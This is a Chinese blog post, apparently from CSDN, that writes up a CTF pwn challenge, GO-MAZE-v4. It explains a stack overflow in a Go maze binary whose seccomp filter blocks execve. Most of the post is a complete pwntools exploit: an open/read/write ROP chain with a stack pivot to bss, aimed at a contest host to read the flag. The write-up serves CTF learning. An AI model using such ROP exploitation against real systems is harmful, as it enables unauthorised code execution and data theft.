GO-MAZE-v4(go语言,栈溢出,orw)

已于 2022-10-15 09:55:05 修改
阅读量595 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
于 2022-09-25 11:38:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/127035899
版权

GO-MAZE-v4:

前言:

来自浙江省第五届大学生网络与信息安全竞赛决赛的一道pwn,比赛时没做出来,根据大佬wp赛后复现

程序大致流程:

就是用wasd走迷宫,走到终点后会有个溢出点
请添加图片描述
然后ida到那个函数可以发现输入长度为0x200,边界是0x178
请添加图片描述
另外这题还禁用了execve,比赛时没发现
请添加图片描述
所以利用就是溢出orw组合读取flag
值得注意的是orw的话rop链还是太长,可以栈迁移到bss段

gdb调试不了解决办法:

gdb调试设置好set follow-fork-mode parent和set detach-on-fork
on才能不会因为system或exec这类函数卡死

exp:

from pwn import *
local_file  = './pwn'
local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = '/lib/x86_64-linux-gnu/libc.so.6'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('1.14.97.218',28231 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
     gdb.attach(r,cmd)
#-----------------------
sl('s')
sl('s')
sl('s')
sl('s')
sl('s')
sl('d')
sl('d')
sl('d')
sl('w')
sl('w')
sl('w')
sl('d')
sl('d')
sl('d')
sl('w')
sl('d')
sl('w')
sl('w')
#------------------
#ROPgadget --binary ./pwn --only "pop|ret"|grep "rdi"
pop_rax_ret=0x400a4f
pop_rdi_ret=0x4008f6
pop_rsi_ret=0x40416f
pop_rdx_ret=0x51d4b6
bss_addr=elf.bss()+0x200
leave_ret=0x4015cb
#ROPgadget --binary ./pwn --only "syscall"
syscall_ret=0x4025ab
str_flag_addr=0x6398F3#ida find
#----------call_sys_open-------------
payload  = 'a'*0x8
payload += p64(pop_rax_ret)
payload += p64(0x2)
payload += p64(pop_rdi_ret)
payload += p64(str_flag_addr)
payload += p64(pop_rsi_ret)
payload += p64(0)
payload += p64(pop_rdx_ret)
payload += p64(0)
payload += p64(syscall_ret)
#-----------call_sys_read------------
payload += p64(pop_rax_ret)
payload += p64(0x0)
payload += p64(pop_rdi_ret)
payload += p64(3)
payload += p64(pop_rsi_ret)
payload += p64(bss_addr)
payload += p64(pop_rdx_ret)
payload += p64(0x50)
payload += p64(syscall_ret)
#-----------call_sys_write------------
payload += p64(pop_rax_ret)
payload += p64(0x1)
payload += p64(pop_rdi_ret)
payload += p64(1)
payload += p64(pop_rsi_ret)
payload += p64(bss_addr)
payload += p64(pop_rdx_ret)
payload += p64(0x50)
payload += p64(syscall_ret)
#--------------------------------
payload1 = p64(pop_rax_ret)
payload1 += p64(0x0)
payload1 += p64(pop_rdi_ret)
payload1 += p64(0)
payload1 += p64(pop_rsi_ret)
payload1 += p64(bss_addr+0x300)
payload1 += p64(pop_rdx_ret)
payload1 += p64(0x200)
payload1 += p64(syscall_ret)
payload1 += p64(leave_ret)
ru('flag\x00')
sl('a'*0x178+p64(bss_addr+0x300)+payload1)
sl(payload)
r.interactive()

请添加图片描述

Nq0inaen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4303
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
haxe-maze:haxe 编程语言中的迷宫生成 - haxenme、openfl、lime
07-08
Haxe编程语言以其强大的跨平台能力和类型安全性在游戏开发和多媒体应用中独树一帜。本文将深入探讨如何使用Haxe来创建迷宫生成器,结合haxenme、OpenFL和Lime库,实现从JavaScript到多种平台的无缝移植。 首先,...
栈溢出
Tianqinse的博客
08-18 3211
栈溢出概念: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。 栈溢出的原因: 局部数组过大。当函数内部的数组过大时,有可能导致堆栈溢出。局部变量是存储在栈中的,因此这个很好理解。解决这类问题的办法有两个,一是增大栈空间,二是改用动态分配,使用堆(heap)而不是栈(stack)。 递归调用层次太多。递归函数在运行时会执行压栈操作,当压栈次数太多时,也会导致堆栈溢出。 指针或数组越界。这种情况最常见,例如进行字符串拷贝,或处理用
go实现栈
Yu的博客
02-11 2806
package main import ( "fmt" "strconv" ) /** 栈:限制插入和删除只能在一个位置上进行的表,该位置是表的末端,叫做栈的顶(top) 对栈的基本操作有push(进栈)和pop(出栈)。 基本算法: 进栈(push): 1.若top>=n时,作出错误处理(进栈前先检查栈是否已满,满则溢出,不满则进入2) 2.置top = top + 1(栈指针加...
c++堆栈溢出怎么解决_Go 协程堆栈设计进化之旅
weixin_40005454的博客
11-28 202
本文详细讲述了 Golang 中,堆栈设计理念以及演变过程。描述了从 Segment Stack 到 Contiguous Stack 、初始堆栈大小从 8Kb 到 2Kb 的原因。Illustration created for “A Journey With Go”, made from the original Go Gopher, created by Renee French.:info...
Go语言 内存逃逸 内存溢出 内存泄漏
weixin_45901764的博客
12-28 2293
内存逃逸 内存分配有两种方式 : 堆分配 和 栈分配 内存逃逸 :Go中程序变量会携带一组校验数据,用来证明它的整个生命周期在程序运行时是否完全可知。如果变量通过了这些校验,它就可以在栈上分配,反之就可以说它逃逸了,这时就必须在堆上分配。 这样做虽然浪费堆空间,但是有效避免了悬挂指针的出现,并且由于GC的存在也不会出现内存泄漏,权衡之下也是一种合理的做法。 出现内存逃逸的情况: 指针逃逸 在方法内把局部变量指针返回时,会出现内存逃逸。因为局部变量原本应该在栈上分配,并且在栈中回收,但是由于在返回时被外
escape-from-the-maze:一个简单而微小的CUI迷宫游戏
05-09
逃离迷宫 一个简单而微小的CUI迷宫游戏安装npm install -g escape-from-the-maze用法开始游戏: escape-from-the-maze 演出排名: escape-from-the-maze --rankingescape-from-the-maze -r 显示帮助: escape-from-...
reinforcement-learning-robot-in-maze-master.zip_Q-learning_Q-lea
07-14
Reinforcement learning, a Q learning algorithm, implementation on a robot that tryies to solve randomly created maze and reach the goal. Note that you can run .m files both on Matlab and Octave.
rusty-maze:控制台迷宫游戏
04-01
用Rust写的Console Maze游戏。 用法 # build and run this project locally cargo run -- --help docker run --rm -it -e COLUMNS= " ` tput cols ` " -e LINES= " ` tput lines ` " ghcr.io/cronik/rusty-maze 主意...
VR-Maze:基于Google VR的迷宫实验
02-06
《VR-Maze:基于Google VR的迷宫实验》是一款运用虚拟现实技术(Virtual Reality, VR)构建的解谜游戏,其核心是通过Unity3D引擎实现的C#编程,为玩家提供沉浸式的游戏体验。这款作品巧妙地融合了VR技术和迷宫游戏的...
pwnorw
weixin_43960998的博客
06-19 1768
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
Go内存溢出与内存泄露
yanghaitao5000的博客
07-04 3803
一、内存泄露与内存溢出的区别 内存溢出(out of memory,简称OOM) 内存溢出是指程序在申请内存时,没有足够的内存空间供其使用,简单点说就是你要求分配的内存超出了系统能给你的,系统不能满足需求,于是产生溢出出现out of memory异常。 内存泄露(memory leak) 内存泄露是指程序在申请内存后,无法释放已申请的内存空间,简单点说就是你向系统申请分配内存进行使用(new),可是使用完了以后却不归还(delete),结果你申请到的那块内存你自己也不能再访问(也许你把它的地址..
【CTF】【PWNorw
m0_50819561的博客
10-09 1330
这是沙盒机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1299
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
【八芒星计划】 ORW
carol2358的博客
09-01 3953
本篇用来记录ORWORW可以分为2.27以下的orw和2.29以上的orw,如果是本地请自备flag文件 orw技术是用来应对沙盒的 文章目录oooorder2019-BALSN-CTF-plaintext oooorder 本题是2.27的orw,漏洞是uaf,漏洞在这里不展开讲,uaf也并不难 2.27的orw既可以使用heap_addr,也可以不要,先讲不需要heap_addr的,毕竟能少泄漏就少泄漏 最重要的是使用了setcontext这个函数,来达成我们控制寄存器的目的 2.27得setcont
orwpwnable_orw和[V&N2020 公开赛]warmup)和 picoctf_2018_rop chain 记录笔记
carol2358的博客
05-21 1370
学到一种新的做法,orw(open,read,write),可以用在system,fork syscall(不能打开子进程,需要在当前进程里读入flag并输出) 和execve被禁的情况下打印出flag,还有seccomp 虽然还不太懂,但先记录一下目前的理解 seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。 著作权归作者所有。商业转
environ泄露栈地址+orw+uaf
FUCKING12的博客
10-08 610
这个题开了沙箱,有uaf。利用思路:借助environ泄露栈地址,利用uaf将orw写到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 6991
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
golang学习系列——16. 函数(2)
night_crow的博客
01-03 300
一. 递归函数 定义 在函数体内调用自身函数 示例 func test(i int) { //todo test(j) } 注意 大量的递归调用容易导致程序栈内存耗尽(栈溢出栈溢出一般可以通过惰性求值的技术来解决:golang 的话可以使用 channel 和 goroutine 来实现惰性求值,举例如下 func generatenums() cha...
如何在python安装gym-maze
最新发布
04-05
要在Python中安装gym-maze,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了Python和pip。如果您还没有安装它们,请先安装它们。 2. 打开终端或命令提示符,并运行以下命令来安装gym-maze: ``` pip ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值